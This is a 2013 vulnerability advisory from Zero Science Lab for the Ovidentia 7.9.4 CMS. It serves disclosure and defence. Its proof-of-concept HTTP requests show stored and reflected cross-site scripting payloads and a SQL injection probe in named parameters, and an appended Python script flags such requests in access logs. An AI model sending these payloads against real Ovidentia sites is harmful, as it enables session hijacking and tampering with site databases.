zeroscience, Gjoko Krstic, ZSL-2013-5154
History: Aug 22, 2013 - 12:00 a.m.

Ovidentia 7.9.4 Multiple Remote Vulnerabilities

2013-08-22 00:00:00
Gjoko Krstic
zeroscience.mk

7.5 High

AI Score

Confidence

High

Title: Ovidentia 7.9.4 Multiple Remote Vulnerabilities
Advisory ID: ZSL-2013-5154
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data, Cross-Site Scripting
Risk: (3/5)
Release Date: 22.08.2013

Summary

Ovidentia is both a content management system (CMS) and a collaborative environment (Groupware).

Description

Input passed via several parameters is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, and to execute arbitrary HTML/script code in a user's browser session in the context of an affected site.

Vendor

Cantico - <http://www.ovidentia.org>

Affected Version

7.9.4

Tested On

Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a

Vendor Status

N/A

PoC

ovidentia_multiple.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://packetstormsecurity.com/files/122896>
[2] <http://secunia.com/advisories/54587/>
[3] <http://cxsecurity.com/issue/WLB-2013080177>
[4] <http://www.securityfocus.com/bid/61936>
[5] <http://www.exploit-db.com/exploits/27771/>
[6] <http://www.osvdb.org/show/osvdb/96516>
[7] <http://1337day.com/1337day-2013-21147>
[8] <http://forums.cnet.com/7726-6132_102-5489845.html>
[9] <http://www.securelist.com/en/advisories/54587>
[10] <http://securitytracker.com/id/1028943>
[11] <http://www.eeye.com/resources/security-center/research/zero-day-tracker/2013/20130822>
[12] <http://xforce.iss.net/xforce/xfdb/86603>
[13] <http://xforce.iss.net/xforce/xfdb/86605>
[14] <http://xforce.iss.net/xforce/xfdb/86606>

Changelog

[22.08.2013] - Initial release
[23.08.2013] - Added reference [6]
[24.08.2013] - Added reference [7], [8] and [9]
[26.08.2013] - Added reference [10]
[07.09.2013] - Added reference [11]
[14.10.2013] - Added reference [12], [13] and [14]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

Ovidentia 7.9.4 Multiple Remote Vulnerabilities


Vendor: Cantico
Product web page: http://www.ovidentia.org
Affected version: 7.9.4

Summary: Ovidentia is both a content management system (CMS) and
a collaborative environment (Groupware).

Desc: Input passed via several parameters is not properly sanitized
before being returned to the user or used in SQL queries. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL
code and HTML/script code in a user's browser session in context of
an affected site.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.7
           MySQL 5.5.25a


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience



Advisory ID: ZSL-2013-5154
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5154.php



08.08.2013

---

============================================================
#1 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

tg	users
idx	Create
pos	A
grp	
widget_filepicker_job_uid[]	52154a53cc0de
user[nickname]	"><script>alert(1);</script>
user[password1]	pass123
user[password2]	pass123
user[notifyuser]	0
user[sendpwd]	0
user[sn]	Testingusio
user[mn]	M
user[givenname]	Testa
user[email]	"><script>alert(2);</script>


============================================================
#2 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

user[id]	2
tg	user
idx	Modify
item	2
pos	
grp	
widget_filepicker_job_uid[]	52154bde9410a
user[nickname]	test
user[setpwd]	0
user[password1]	
user[password2]	
user[sendpwd]	0
user[sn]	"><script>alert(3);</script>
user[mn]	M
user[givenname]	"><script>alert(4);</script>
user[email]	[email protected]

GET http://localhost/ovidentia/index.php?tg=user&idx=Modify&item=2&pos=&grp= HTTP/1.1


============================================================
#3 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

Submit2	Update
idx	modify
item	1
ovmldetail	"><script>alert(5);</script>
ovmlembedded	"><script>alert(6);</script>
tg	admoc
update	ovmldb


============================================================
#4 - Reflected XSSs
------------------------------------------------------------

GET http://localhost/ovidentia/index.php?tg=users&bupd="><script>alert(7);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=addon/widgets/groups&idx=get&id_parent="><script>alert(8);</script>&uid=widget_acl99&levels=2&id_delegation=0
GET http://localhost/ovidentia/index.php?tg=admoc&idx=addoc&item="><script>alert(9);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A"><script>alert(10);</script>&grp=&sSearchText= HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A&grp=&sSearchText="><script>alert(11);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=admfm&idx=modify&fid=1"><script>alert(12);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?idx=options&tg=calopt&urla=javascript:prompt(13); HTTP/1.1
GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1_<script>prompt(14)</script>&iIdProject=-1&tg=usrTskMgr
GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1&iIdProject=0_<script>prompt(15)</script>&tg=usrTskMgr
GET http://localhost/ovidentia/index.php?ids=1"onmouseover=prompt(16)>&idx=hpriv&tg=topman


============================================================
#5 - SQL Injection
------------------------------------------------------------

GET http://localhost/ovidentia/index.php?tg=admoc&idx=octypes&action=delete_type&item=1%27&entitytype=2
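
Added example (not part of the original advisory or of Ovidentia): a log check for sites still running 7.9.4 that flags requests whose query parameters from items #4 and #5 carry HTML metacharacters, a script URL or a single quote. The log lines are constructed samples; the reason labels and the choice of common log format are assumptions, and the POST bodies of items #1 to #3 are not covered because they do not appear in access logs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Query parameters that appear in requests #4 and #5 of the advisory.
WATCHED = {"bupd", "id_parent", "item", "pos", "sSearchText", "fid",
           "urla", "iIdOwner", "iIdProject", "ids"}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>"]')                      # breaks out of a tag or attribute
SCRIPT_URL = re.compile(r'^\s*javascript:', re.I)  # script URL, as in the urla request

def classify(value):
    """Return a reason label if the decoded value looks like an injection probe."""
    if MARKUP.search(value):
        return "html-metacharacter"
    if SCRIPT_URL.match(value):
        return "script-url"
    if "'" in value:
        return "sql-quote"
    return None

def scan(log_lines):
    """Return (line_number, parameter, reason) for suspicious watched parameters."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line we can parse
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes, so %27 and %3C are checked as ' and <.
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify(value) if name in WATCHED else None
            if reason:
                hits.append((number, name, reason))
    return hits

# Constructed sample log lines (Apache common log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Aug/2013:10:00:01 +0200] "GET /ovidentia/index.php?tg=users&idx=List&pos=A&grp=&sSearchText=smith HTTP/1.1" 200 5120',
    '192.0.2.77 - - [22/Aug/2013:10:00:05 +0200] "GET /ovidentia/index.php?tg=users&bupd=%22%3E%3Cscript%3Ealert(7)%3B%3C/script%3E HTTP/1.1" 200 4812',
    '192.0.2.77 - - [22/Aug/2013:10:00:09 +0200] "GET /ovidentia/index.php?tg=admoc&idx=octypes&action=delete_type&item=1%27&entitytype=2 HTTP/1.1" 200 903',
    '192.0.2.77 - - [22/Aug/2013:10:00:12 +0200] "GET /ovidentia/index.php?idx=options&tg=calopt&urla=javascript:prompt(13)%3B HTTP/1.1" 200 2750',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A single quote in a free-text parameter such as sSearchText can be a legitimate search term, so sql-quote hits there are triage leads rather than confirmed injection attempts.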
